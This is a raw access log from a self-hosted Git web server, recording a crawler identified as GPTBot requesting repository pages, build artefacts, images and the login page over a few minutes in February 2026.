"/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj" [Client 74.7.227.38] [Length 9795] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:17:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fPKG-00.toc" [Client 74.7.227.38] [Length 23958] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PKG-00.toc" +[17/Feb/2026:17:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23798] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.pyz" +[17/Feb/2026:17:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fEXE-00.toc" [Client 74.7.227.38] [Length 23935] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/EXE-00.toc" +[17/Feb/2026:17:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23943] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.toc" +[17/Feb/2026:17:08:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/xref-GoldMonitor_V5.3.html" +[17/Feb/2026:17:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fEXE-00.toc" [Client 74.7.227.38] [Length 23951] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/EXE-00.toc" +[17/Feb/2026:17:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23812] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PYZ-00.pyz" +[17/Feb/2026:17:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23925] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/PYZ-00.toc" +[17/Feb/2026:17:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fPYZ-00.pyz" [Client 74.7.227.38] [Length 23810] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.pyz" +[17/Feb/2026:17:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.2%2fPKG-00.toc" [Client 74.7.227.38] [Length 23929] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/PKG-00.toc" +[17/Feb/2026:17:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fPKG-00.toc" [Client 74.7.227.38] [Length 23970] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/PKG-00.toc" +[17/Feb/2026:17:09:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.1%2fPYZ-00.toc" [Client 74.7.227.38] [Length 23958] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/PYZ-00.toc" +[17/Feb/2026:17:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fGoldMonitor_V5.3%2fEXE-00.toc" [Client 74.7.227.38] [Length 23954] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/EXE-00.toc" +[17/Feb/2026:17:09:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:09:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:09:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:17:09:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom3.png" +[17/Feb/2026:17:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:17:09:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10902] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom2.png" +[17/Feb/2026:17:09:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:17:09:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:17:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 9842] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/favicon.ico" +[17/Feb/2026:17:09:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:09:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:17:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10042] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 11111] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 11119] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images" +[17/Feb/2026:17:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11185] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11486] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:09:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13299] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:17:09:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 10970] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13535] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:17:09:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12174] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:17:09:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11003] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:09:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 9845] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:09:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 10524] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" +[17/Feb/2026:17:09:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/instrument.png" +[17/Feb/2026:17:09:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/assets/images/BatchControl.png" +[17/Feb/2026:17:09:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] 